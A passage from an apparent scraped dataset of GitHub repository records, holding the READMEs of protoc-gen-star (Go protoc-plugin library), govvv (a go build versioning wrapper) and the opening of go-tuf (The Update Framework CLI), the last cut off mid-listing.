First, PG* unmarshals the `CodeGeneratorRequest` received from `protoc`, and creates a fully connected abstract syntax tree (AST) of each file and all its contained entities. Any parameters specified for this plugin are also parsed for later consumption.\n\nWhen this step is complete, PG* then executes any registered `Modules`, handing it the constructed AST. `Modules` can be written to generate artifacts (eg, files) or just performing some form of validation over the provided graph without any other side effects. `Modules` provide the great flexibility in terms of operating against the PBs.\n\nOnce all `Modules` are run, PG* writes any custom artifacts to the file system or serializes generator-specific ones into a `CodeGeneratorResponse` and sends the data to its `stdout`. `protoc` receives this payload, unmarshals it, and persists any requested files to disk after all its plugins have returned. This whole flow looks something like this:\n\n```\nfoo.proto \u2192 protoc \u2192 CodeGeneratorRequest \u2192 protoc-gen-myplugin \u2192 CodeGeneratorResponse \u2192 protoc \u2192 foo.pb.go\n```\n\nThe PG* library hides away nearly all of this complexity required to implement a protoc-plugin!\n\n### Modules\n\nPG* `Modules` are handed a complete AST for those files that are targeted for generation as well as all dependencies. A `Module` can then add files to the protoc `CodeGeneratorResponse` or write files directly to disk as `Artifacts`.\n\nPG* provides a `ModuleBase` struct to simplify developing modules. Out of the box, it satisfies the interface for a `Module`, only requiring the creation of `Name` and `Execute` methods. `ModuleBase` is best used as an anonyomous embedded field of a wrapping `Module` implementation. A minimal module would look like the following:\n\n```go\n// ReportModule creates a report of all the target messages generated by the\n// protoc run, writing the file into the /tmp directory.\ntype reportModule struct {\n *pgs.ModuleBase\n}\n\n// New configures the module with an instance of ModuleBase\nfunc New() pgs.Module { return &reportModule{&pgs.ModuleBase{}} }\n\n// Name is the identifier used to identify the module. This value is\n// automatically attached to the BuildContext associated with the ModuleBase.\nfunc (m *reportModule) Name() string { return \"reporter\" }\n\n// Execute is passed the target files as well as its dependencies in the pkgs\n// map. The implementation should return a slice of Artifacts that represent\n// the files to be generated. In this case, \"/tmp/report.txt\" will be created\n// outside of the normal protoc flow.\nfunc (m *reportModule) Execute(targets map[string]pgs.File, pkgs map[string]pgs.Package) []pgs.Artifact {\n buf := &bytes.Buffer{}\n\n for _, f := range targets {\n m.Push(f.Name().String()).Debug(\"reporting\")\n\n fmt.Fprintf(buf, \"--- %v ---\", f.Name())\n\n for i, msg := range f.AllMessages() {\n fmt.Fprintf(buf, \"%03d. %v\\n\", i, msg.Name())\n }\n\n m.Pop()\n }\n\n m.OverwriteCustomFile(\n \"/tmp/report.txt\",\n buf.String(),\n 0644,\n )\n\n return m.Artifacts()\n}\n```\n\n`ModuleBase` exposes a PG* [`BuildContext`][context] instance, already prefixed with the module's name. Calling `Push` and `Pop` allows adding further information to error and debugging messages. Above, each file from the target package is pushed onto the context before logging the \"reporting\" debug message.\n\nThe base also provides helper methods for adding or overwriting both protoc-generated and custom files. 
The above execute method creates a custom file at `/tmp/report.txt` specifying that it should overwrite an existing file with that name. If it instead called `AddCustomFile` and the file existed, no file would have been generated (though a debug message would be logged out). Similar methods exist for adding generator files, appends, and injections. Likewise, methods such as `AddCustomTemplateFile` allows for `Templates` to be rendered instead.\n\nAfter all modules have been executed, the returned `Artifacts` are either placed into the `CodeGenerationResponse` payload for protoc or written out to the file system. For testing purposes, the file system has been abstracted such that a custom one (such as an in-memory FS) can be provided to the PG* generator with the `FileSystem` `InitOption`.\n\n#### Post Processing\n\n`Artifacts` generated by `Modules` sometimes require some mutations prior to writing to disk or sending in the response to protoc. This could range from running `gofmt` against Go source or adding copyright headers to all generated source files. To simplify this task in PG*, a `PostProcessor` can be utilized. A minimal looking `PostProcessor` implementation might look like this:\n\n```go\n// New returns a PostProcessor that adds a copyright comment to the top\n// of all generated files.\nfunc New(owner string) pgs.PostProcessor { return copyrightPostProcessor{owner} }\n\ntype copyrightPostProcessor struct {\n owner string\n}\n\n// Match returns true only for Custom and Generated files (including templates).\nfunc (cpp copyrightPostProcessor) Match(a pgs.Artifact) bool {\n switch a := a.(type) {\n case pgs.GeneratorFile, pgs.GeneratorTemplateFile,\n pgs.CustomFile, pgs.CustomTemplateFile:\n return true\n default:\n return false\n }\n}\n\n// Process attaches the copyright header to the top of the input bytes\nfunc (cpp copyrightPostProcessor) Process(in []byte) (out []byte, err error) {\n cmt := fmt.Sprintf(\"// Copyright \u00a9 %d %s. All rights reserved\\n\",\n time.Now().Year(),\n cpp.owner)\n\n return append([]byte(cmt), in...), nil\n}\n```\n\nThe `copyrightPostProcessor` struct satisfies the `PostProcessor` interface by implementing the `Match` and `Process` methods. After PG* recieves all `Artifacts`, each is handed in turn to each registered processor's `Match` method. In the above case, we return `true` if the file is a part of the targeted Artifact types. If `true` is returned, `Process` is immediately called with the rendered contents of the file. This method mutates the input, returning the modified value to out or an error if something goes wrong. Above, the notice is prepended to the input.\n\nPostProcessors are registered with PG* similar to `Modules`:\n\n```go\ng := pgs.Init(pgs.IncludeGo())\ng.RegisterModule(some.NewModule())\ng.RegisterPostProcessor(copyright.New(\"PG* Authors\"))\n```\n\n## Protocol Buffer AST\n\nWhile `protoc` ensures that all the dependencies required to generate a proto file are loaded in as descriptors, it's up to the protoc-plugins to recognize the relationships between them. To get around this, PG* uses constructs an abstract syntax tree (AST) of all the `Entities` loaded into the plugin. This AST is provided to every `Module` to facilitate code generation.\n\n### Hierarchy\n\nThe hierarchy generated by the PG* `gatherer` is fully linked, starting at a top-level `Package` down to each individual `Field` of a `Message`. The AST can be represented with the following digraph:\n\n
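In simplified, text-only form (arrows point from a container to the entities it contains or refers to; the full relationships are spelled out in the next paragraph):\n\n```text\nPackage -> File -> {Message, Enum, Service}\nService -> Method -> Message (input/output)\nEnum -> EnumValue\nMessage -> {Message, Enum, Field, OneOf}\nField -> {Message, Enum} (non-scalar types only)\nOneOf -> Field\n```\n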

\n\nA `Package` describes a set of `Files` loaded within the same namespace. As would be expected, a `File` represents a single proto file, which contains any number of `Message`, `Enum` or `Service` entities. An `Enum` describes an integer-based enumeration type, containing each individual `EnumValue`. A `Service` describes a set of RPC `Methods`, which in turn refer to their input and output `Messages`.\n\nA `Message` can contain other nested `Messages` and `Enums` as well as each of its `Fields`. For non-scalar types, a `Field` may also reference its `Message` or `Enum` type. As a mechanism for achieving union types, a `Message` can also contain `OneOf` entities that refer to some of its `Fields`.\n\n### Visitor Pattern\n\nThe structure of the AST can be fairly complex and unpredictable. Likewise, `Module's` are typically concerned with only a subset of the entities in the graph. To separate the `Module's` algorithm from understanding and traversing the structure of the AST, PG* implements the `Visitor` pattern to decouple the two. Implementing this interface is straightforward and can greatly simplify code generation.\n\nTwo base `Visitor` structs are provided by PG* to simplify developing implementations. First, the `NilVisitor` returns an instance that short-circuits execution for all Entity types. This is useful when certain branches of the AST are not interesting to code generation. For instance, if the `Module` is only concerned with `Services`, it can use a `NilVisitor` as an anonymous field and only implement the desired interface methods:\n\n```go\n// ServiceVisitor logs out each Method's name\ntype serviceVisitor struct {\n pgs.Visitor\n pgs.DebuggerCommon\n}\n\nfunc New(d pgs.DebuggerCommon) pgs.Visitor {\n return serviceVistor{\n Visitor: pgs.NilVisitor(),\n DebuggerCommon: d,\n }\n}\n\n// Passthrough Packages, Files, and Services. All other methods can be\n// ignored since Services can only live in Files and Files can only live in a\n// Package.\nfunc (v serviceVisitor) VisitPackage(pgs.Package) (pgs.Visitor, error) { return v, nil }\nfunc (v serviceVisitor) VisitFile(pgs.File) (pgs.Visitor, error) { return v, nil }\nfunc (v serviceVisitor) VisitService(pgs.Service) (pgs.Visitor, error) { return v, nil }\n\n// VisitMethod logs out ServiceName#MethodName for m.\nfunc (v serviceVisitor) VisitMethod(m pgs.Method) (pgs.Vistitor, error) {\n v.Logf(\"%v#%v\", m.Service().Name(), m.Name())\n return nil, nil\n}\n```\n\nIf access to deeply nested `Nodes` is desired, a `PassthroughVisitor` can be used instead. Unlike `NilVisitor` and as the name suggests, this implementation passes through all nodes instead of short-circuiting on the first unimplemented interface method. 
Setup of this type as an anonymous field is a bit more complex but avoids implementing each method of the interface explicitly:\n\n```go\ntype fieldVisitor struct {\n pgs.Visitor\n pgs.DebuggerCommon\n}\n\nfunc New(d pgs.DebuggerCommon) pgs.Visitor {\n v := &fieldVisitor{DebuggerCommon: d}\n v.Visitor = pgs.PassThroughVisitor(v)\n return v\n}\n\nfunc (v *fieldVisitor) VisitField(f pgs.Field) (pgs.Visitor, error) {\n v.Logf(\"%v.%v\", f.Message().Name(), f.Name())\n return nil, nil\n}\n```\n\nWalking the AST with any `Visitor` is straightforward:\n\n```go\nv := visitor.New(d)\nerr := pgs.Walk(v, pkg)\n```\n\nAll `Entity` types and `Package` can be passed into `Walk`, allowing for starting a `Visitor` lower than the top-level `Package` if desired.\n\n## Build Context\n\n`Modules` registered with the PG* `Generator` are initialized with an instance of `BuildContext` that encapsulates contextual paths, debugging, and parameter information.\n\n### Output Paths\n\nThe `BuildContext's` `OutputPath` method returns the output directory that the PG* plugin is targeting. This path is also initially `.` but refers to the directory in which `protoc` is executed. This default behavior can be overridden by providing an `output_path` in the flag.\n\nThe `OutputPath` can be used to create file names for `Artifacts`, using `JoinPath(name ...string)` which is essentially an alias for `filepath.Join(ctx.OutputPath(), name...)`. Manually tracking directories relative to the `OutputPath` can be tedious, especially if the names are dynamic. Instead, a `BuildContext` can manage these, via `PushDir` and `PopDir`.\n\n```go\nctx.OutputPath() // foo\nctx.JoinPath(\"fizz\", \"buzz.go\") // foo/fizz/buzz.go\n\nctx = ctx.PushDir(\"bar/baz\")\nctx.OutputPath() // foo/bar/baz\nctx.JoinPath(\"quux.go\") // foo/bar/baz/quux.go\n\nctx = ctx.PopDir()\nctx.OutputPath() // foo\n```\n\n`ModuleBase` wraps these methods to mutate their underlying `BuildContexts`. Those methods should be used instead of the ones on the contained `BuildContext` directly.\n\n### Debugging\n\nThe `BuildContext` exposes a `DebuggerCommon` interface which provides utilities for logging, error checking, and assertions. `Log` and the formatted `Logf` print messages to `os.Stderr`, typically prefixed with the `Module` name. `Debug` and `Debugf` behave the same, but only print if enabled via the `DebugMode` or `DebugEnv` `InitOptions`.\n\n`Fail` and `Failf` immediately stops execution of the protoc-plugin and causes `protoc` to fail generation with the provided message. `CheckErr` and `Assert` also fail with the provided messages if an error is passed in or if an expression evaluates to false, respectively.\n\nAdditional contextual prefixes can be provided by calling `Push` and `Pop` on the `BuildContext`. This behavior is similar to `PushDir` and `PopDir` but only impacts log messages. `ModuleBase` wraps these methods to mutate their underlying `BuildContexts`. Those methods should be used instead of the ones on the contained `BuildContext` directly.\n\n### Parameters\n\nThe `BuildContext` also provides access to the pre-processed `Parameters` from the specified protoc flag. The only PG*-specific key expected is \"output_path\", which is utilized by a module's `BuildContext` for its `OutputPath`.\n\nPG* permits mutating the `Parameters` via the `MutateParams` `InitOption`. 
By passing in a `ParamMutator` function here, these KV pairs can be modified or verified prior to the PGG workflow begins.\n\n## Language-Specific Subpackages\n\nWhile implemented in Go, PG* seeks to be language agnostic in what it can do. Therefore, beyond the pre-generated base descriptor types, PG* has no dependencies on the protoc-gen-go (PGG) package. However, there are many nuances that each language's protoc-plugin introduce that can be generalized. For instance, PGG package naming, import paths, and output paths are a complex interaction of the proto package name, the `go_package` file option, and parameters passed to protoc. While PG*'s core API should not be overloaded with many language-specific methods, subpackages can be provided that can operate on `Parameters` and `Entities` to derive the appropriate results.\n\nPG* currently implements the [pgsgo](https://godoc.org/github.com/lyft/protoc-gen-star/v2/lang/go/)\u00a0subpackage to provide these utilities to plugins targeting the Go language. Future subpackages are planned to support a variety of languages.\n\n## PG* Development & Make Targets\n\nPG* seeks to provide all the tools necessary to rapidly and ergonomically extend and build on top of the Protocol Buffer IDL. Whether the goal is to modify the official protoc-gen-go output or create entirely new files and packages, this library should offer a user-friendly wrapper around the complexities of the PB descriptors and the protoc-plugin workflow.\n\n### Setup\n\nFor developing on PG*, you should install the package within the `GOPATH`. PG* uses [glide][glide] for dependency management.\n\n```sh\ngo get -u github.com/lyft/protoc-gen-star\ncd $GOPATH/src/github.com/lyft/protoc-gen-star\nmake vendor\n```\n\nTo upgrade dependencies, please make the necessary modifications in `glide.yaml` and run `glide update`.\n\n### Linting & Static Analysis\n\nTo avoid style nits and also to enforce some best practices for Go packages, PG* requires passing `golint`, `go vet`, and `go fmt -s` for all code changes.\n\n```sh\nmake lint\n```\n\n### Testing\n\nPG* strives to have near 100% code coverage by unit tests. Most unit tests are run in parallel to catch potential race conditions. There are three ways of running unit tests, each taking longer than the next but providing more insight into test coverage:\n\n```sh\n# run code generation for the data used by the tests\nmake testdata\n\n# run unit tests without race detection or code coverage reporting\nmake quick\n\n# run unit tests with race detection and code coverage\nmake tests\n\n# run unit tests with race detection and generates a code coverage report, opening in a browser\nmake cover\n```\n\n#### protoc-gen-debug\n\nPG* comes with a specialized protoc-plugin, `protoc-gen-debug`. This plugin captures the CodeGeneratorRequest from a protoc execution and saves the serialized PB to disk. These files can be used as inputs to prevent calling protoc from tests.\n\n### Documentation\n\nGo is a self-documenting language, and provides a built in utility to view locally: `godoc`. The following command starts a godoc server and opens a browser window to this package's documentation. If you see a 404 or unavailable page initially, just refresh.\n\n```sh\nmake docs\n```\n\n### Demo\n\nPG* comes with a \"kitchen sink\" example: [`protoc-gen-example`][pge]. This protoc plugin built on top of PG* prints out the target package's AST as a tree to stderr. 
This provides an end-to-end way of validating each of the nuanced types and nesting in PB descriptors:\n\n```sh\n# create the example PG*-based plugin\nmake bin/protoc-gen-example\n\n# run protoc-gen-example against the demo protos\nmake testdata/generated\n```\n\n#### CI\n\nPG* uses [TravisCI][travis] to validate all code changes. Please view the [configuration][travis.yml] for what tests are involved in the validation.\n\n[glide]: http://glide.sh\n[pgg]: https://github.com/golang/protobuf/tree/master/protoc-gen-go\n[pge]: https://github.com/lyft/protoc-gen-star/tree/master/testdata/protoc-gen-example\n[travis]: https://travis-ci.com/lyft/protoc-gen-star\n[travis.yml]: https://github.com/lyft/protoc-gen-star/tree/master/.travis.yml\n[module]: https://github.com/lyft/protoc-gen-star/blob/master/module.go\n[pb]: https://developers.google.com/protocol-buffers/\n[context]: https://github.com/lyft/protoc-gen-star/tree/master/build_context.go\n[visitor]: https://github.com/lyft/protoc-gen-star/tree/master/node.go\n[params]: https://github.com/lyft/protoc-gen-star/tree/master/parameters.go\n[make]: https://github.com/lyft/protoc-gen-star/blob/master/Makefile\n[single]: https://github.com/golang/protobuf/pull/40\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ahmetb/govvv", "link": "https://github.com/ahmetb/govvv", "tags": ["go", "versioning"], "stars": 530, "description": "\"go build\" wrapper to add version info to Golang applications", "lang": "Go", "repo_lang": "", "readme": "# govvv\n\nThe simple Go binary versioning tool that wraps the `go build` command. \n\n![](https://cl.ly/0U2m441v392Q/intro-1.gif)\n\nStop worrying about `-ldflags` and **`go get github.com/ahmetb/govvv`** now.\n\n## Build Variables\n\n| Variable | Description | Example |\n|----------|-------------|---------|\n| **`main.GitCommit`** | short commit hash of source tree | `0b5ed7a` |\n| **`main.GitBranch`** | current branch name the code is built off | `master` |\n| **`main.GitState`** | whether there are uncommitted changes | `clean` or `dirty` | \n| **`main.GitSummary`** | output of `git describe --tags --dirty --always` | `v1.0.0`,
`v1.0.1-5-g585c78f-dirty`,
`fbd157c` |\n| **`main.BuildDate`** | RFC3339 formatted UTC date | `2016-08-04T18:07:54Z` |\n| **`main.Version`** | contents of `./VERSION` file, if exists, or the value passed via the `-version` option | `2.0.0` |\n\n## Using govvv is easy\n\nJust add the build variables you want to the `main` package and run:\n\n| old | :sparkles: new :sparkles: |\n| -------------|-----------------|\n| `go build` | `govvv build` |\n| `go install` | `govvv install` | \n\n## Version your app with govvv\n\nCreate a `VERSION` file in your build root directory and add a `Version`\nvariable to your `main` package.\n\n![](https://cl.ly/3Q1K1R2D3b2K/intro-2.gif)\n\nDo you have your own way of specifying `Version`? No problem:\n\n## govvv lets you specify custom `-ldflags`\n\nYour existing `-ldflags` argument will still be preserved:\n\n govvv build -ldflags \"-X main.BuildNumber=$buildnum\" myapp\n\nand the `-ldflags` constructed by govvv will be appended to your flag.\n\n## Don\u2019t want to depend on `govvv`? It\u2019s fine!\n\nYou can just pass a `-print` argument and `govvv` will just print the\n`go build` command with `-ldflags` for you and will not execute the go tool:\n\n $ govvv build -print\n go build \\\n\t -ldflags \\\n\t \"-X main.GitCommit=57b9870 -X main.GitBranch=dry-run -X main.GitState=dirty -X main.Version=0.1.0 -X main.BuildDate=2016-08-08T20:50:21Z\"\n\nStill don\u2019t want to wrap the `go` tool? Well, try `-flags` to retrieve the LDFLAGS govvv prepares:\n\n $ go build -ldflags=\"$(govvv -flags)\"\n\n## Want to use a different package?\n\nYou can pass a `-pkg` argument with the full package name, and `govvv` will \nset the build variables in that package instead of `main`. For example:\n\n```\n# build with govvv\n$ govvv build -pkg github.com/myacct/myproj/mypkg\n\n# build with go\n$ go build -ldflags=\"$(govvv -flags -pkg $(go list ./mypkg))\"\n```\n## Want to use a different version?\n\nYou can pass a `-version` argument with the desired version, and `govvv` will \nuse the specified version instead of obtaining it from the `./VERSION` file.\nFor example:\n\n```\n# build with govvv\n$ govvv build -version 1.2.3\n\n# build with go\n$ go build -ldflags=\"$(govvv -flags -version 1.2.3)\"\n```\n\n## Try govvv today\n\n $ go get github.com/ahmetb/govvv\n\n------\n\ngovvv is distributed under [Apache 2.0 License](LICENSE).\n\nCopyright 2016 Ahmet Alp Balkan \n\n------\n\n[![Build Status](https://travis-ci.org/ahmetb/govvv.svg?branch=master)](https://travis-ci.org/ahmetb/govvv)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "theupdateframework/go-tuf", "link": "https://github.com/theupdateframework/go-tuf", "tags": ["go", "golang", "security", "supply-chain", "tuf", "hacktoberfest"], "stars": 530, "description": "Go implementation of The Update Framework (TUF)", "lang": "Go", "repo_lang": "", "readme": "# go-tuf\n\n[![build](https://github.com/theupdateframework/go-tuf/workflows/build/badge.svg)](https://github.com/theupdateframework/go-tuf/actions?query=workflow%3Abuild) [![Coverage Status](https://coveralls.io/repos/github/theupdateframework/go-tuf/badge.svg)](https://coveralls.io/github/theupdateframework/go-tuf) [![PkgGoDev](https://pkg.go.dev/badge/github.com/theupdateframework/go-tuf)](https://pkg.go.dev/github.com/theupdateframework/go-tuf) [![Go Report Card](https://goreportcard.com/badge/github.com/theupdateframework/go-tuf)](https://goreportcard.com/report/github.com/theupdateframework/go-tuf)\n\nThis is 
a Go implementation of [The Update Framework (TUF)](http://theupdateframework.com/),\na framework for securing software update systems.\n\n## Directory layout\n\nA TUF repository has the following directory layout:\n\n```bash\n.\n\u251c\u2500\u2500 keys\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 targets\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u2514\u2500\u2500 targets\n```\n\nThe directories contain the following files:\n\n- `keys/` - signing keys (optionally encrypted) with filename pattern `ROLE.json`\n- `repository/` - signed metadata files\n- `repository/targets/` - hashed target files\n- `staged/` - either signed, unsigned or partially signed metadata files\n- `staged/targets/` - unhashed target files\n\n## CLI\n\n`go-tuf` provides a CLI for managing a local TUF repository.\n\n### Install\n\n`go-tuf` is tested on Go versions 1.18.\n\n```bash\ngo get github.com/theupdateframework/go-tuf/cmd/tuf\n```\n\n### Commands\n\n#### `tuf init [--consistent-snapshot=false]`\n\nInitializes a new repository.\n\nThis is only required if the repository should not generate consistent\nsnapshots (i.e. by passing `--consistent-snapshot=false`). If consistent\nsnapshots should be generated, the repository will be implicitly\ninitialized to do so when generating keys.\n\n#### `tuf gen-key [--expires=] `\n\nPrompts the user for an encryption passphrase (unless the\n`--insecure-plaintext` flag is set), then generates a new signing key and\nwrites it to the relevant key file in the `keys` directory. It also stages\nthe addition of the new key to the `root` metadata file. Alternatively, passphrases\ncan be set via environment variables in the form of `TUF_{{ROLE}}_PASSPHRASE`\n\n#### `tuf revoke-key [--expires=] `\n\nRevoke a signing key\n\nThe key will be removed from the root metadata file, but the key will remain in the\n\"keys\" directory if present.\n\n#### `tuf add [...]`\n\nHashes files in the `staged/targets` directory at the given path(s), then\nupdates and stages the `targets` metadata file. Specifying no paths hashes all\nfiles in the `staged/targets` directory.\n\n#### `tuf remove [...]`\n\nStages the removal of files with the given path(s) from the `targets` metadata file\n(they get removed from the filesystem when the change is committed). Specifying\nno paths removes all files from the `targets` metadata file.\n\n#### `tuf snapshot [--expires=]`\n\nExpects a staged, fully signed `targets` metadata file and stages an appropriate\n`snapshot` metadata file. Optionally one can set number of days after which\nthe `snapshot` metadata will expire.\n\n#### `tuf timestamp [--expires=]`\n\nStages an appropriate `timestamp` metadata file. If a `snapshot` metadata file is staged,\nit must be fully signed. Optionally one can set number of days after which\nthe timestamp metadata will expire.\n\n#### `tuf sign `\n\nSigns the given role's staged metadata file with all keys present in the `keys`\ndirectory for that role.\n\n#### `tuf commit`\n\nVerifies that all staged changes contain the correct information and are signed\nto the correct threshold, then moves the staged files into the `repository`\ndirectory. 
It also removes any target files which are not in the `targets`\nmetadata file.\n\n#### `tuf regenerate [--consistent-snapshot=false]`\n\nNote: Not supported yet\n\nRecreates the `targets` metadata file based on the files in `repository/targets`.\n\n#### `tuf clean`\n\nRemoves all staged metadata files and targets.\n\n#### `tuf root-keys`\n\nOutputs a JSON serialized array of root keys to STDOUT. The resulting JSON\nshould be distributed to clients for performing initial updates.\n\n#### `tuf set-threshold `\n\nSets `role`'s threshold (required number of keys for signing) to\n`threshold`.\n\n#### `tuf get-threshold `\n\nOutputs `role`'s threshold (required number of keys for signing).\n\n#### `tuf change-passphrase `\n\nChanges the passphrase for given role keys file. The CLI supports reading\nboth the existing and the new passphrase via the following environment\nvariables - `TUF_{{ROLE}}_PASSPHRASE` and respectively `TUF_NEW_{{ROLE}}_PASSPHRASE`\n\n#### `tuf payload `\n\nOutputs the metadata file for a role in a ready-to-sign (canonicalized) format.\n\nSee also `tuf sign-payload` and `tuf add-signatures`.\n\n#### `tuf sign-payload --role= `\n\nSign a file (outside of the TUF repo) using keys (in the TUF keys database,\ntypically produced by `tuf gen-key`) for the given `role` (from the TUF repo).\n\nTypically, `path` will be a file containing the output of `tuf payload`.\n\nSee also `tuf add-signatures`.\n\n#### `tuf add-signatures --signatures `\n\n\nAdds signatures (the output of `tuf sign-payload`) to the given role metadata file.\n\nIf the signature does not verify, it will not be added.\n\n#### `tuf status --valid-at `\n\nCheck if the role's metadata will be expired on the given date. \n\n#### Usage of environment variables\n\nThe `tuf` CLI supports receiving passphrases via environment variables in\nthe form of `TUF_{{ROLE}}_PASSPHRASE` for existing ones and\n`TUF_NEW_{{ROLE}}_PASSPHRASE` for setting new ones.\n\nFor a list of supported commands, run `tuf help` from the command line.\n\n### Examples\n\nThe following are example workflows for managing a TUF repository with the CLI.\n\nThe `tree` commands do not need to be run, but their output serve as an\nillustration of what files should exist after performing certain commands.\n\nAlthough only two machines are referenced (i.e. 
the \"root\" and \"repo\" boxes),\nthe workflows can be trivially extended to many signing machines by copying\nstaged changes and signing on each machine in turn before finally committing.\n\nSome key IDs are truncated for illustrative purposes.\n\n#### Create signed root metadata file\n\nGenerate a root key on the root box:\n\n```bash\n$ tuf gen-key root\nEnter root keys passphrase:\nRepeat root keys passphrase:\nGenerated root key with ID 184b133f\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 root.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n```\n\nCopy `staged/root.json` from the root box to the repo box and generate targets,\nsnapshot and timestamp keys:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n\n$ tuf gen-key targets\nEnter targets keys passphrase:\nRepeat targets keys passphrase:\nGenerated targets key with ID 8cf4810c\n\n$ tuf gen-key snapshot\nEnter snapshot keys passphrase:\nRepeat snapshot keys passphrase:\nGenerated snapshot key with ID 3e070e53\n\n$ tuf gen-key timestamp\nEnter timestamp keys passphrase:\nRepeat timestamp keys passphrase:\nGenerated timestamp key with ID a3768063\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n```\n\nCopy `staged/root.json` from the repo box back to the root box and sign it:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n\n$ tuf sign root.json\nEnter root keys passphrase:\n```\n\nThe staged `root.json` can now be copied back to the repo box ready to be\ncommitted alongside other metadata files.\n\n#### Alternate signing flow\n\nInstead of manually copying `root.json` into the TUF repository on the root box,\nyou can use the `tuf payload`, `tuf sign-payload`, `tuf add-signatures` flow.\n\nOn the repo box, get the `root.json` payload in a canonical format:\n\n``` bash\n$ tuf payload root.json > root.json.payload\n```\n\nCopy `root.json.payload` to the root box and sign it:\n\n\n``` bash\n$ tuf sign-payload --role=root root.json.payload > root.json.sigs\nEnter root keys passphrase:\n```\n\nCopy `root.json.sigs` back to the repo box and import the signatures:\n\n``` bash\n$ tuf add-signatures --signatures root.json.sigs root.json\n```\n\nThis achieves the same state as the above flow for the repo box:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n```\n\n#### Add a target file\n\nAssuming a staged, signed `root` metadata file and the file to add exists at\n`staged/targets/foo/bar/baz.txt`:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 
timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 root.json\n \u2514\u2500\u2500 targets\n \u2514\u2500\u2500 foo\n \u2514\u2500\u2500 bar\n \u2514\u2500\u2500 baz.txt\n\n$ tuf add foo/bar/baz.txt\nEnter targets keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 root.json\n \u251c\u2500\u2500 targets\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n \u2514\u2500\u2500 targets.json\n\n$ tuf snapshot\nEnter snapshot keys passphrase:\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 root.json\n \u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n \u251c\u2500\u2500 targets\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n \u00a0\u00a0 \u251c\u2500\u2500 targets.json\n \u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Remove a target file\n\nAssuming the file to remove is at `repository/targets/foo/bar/baz.txt`:\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 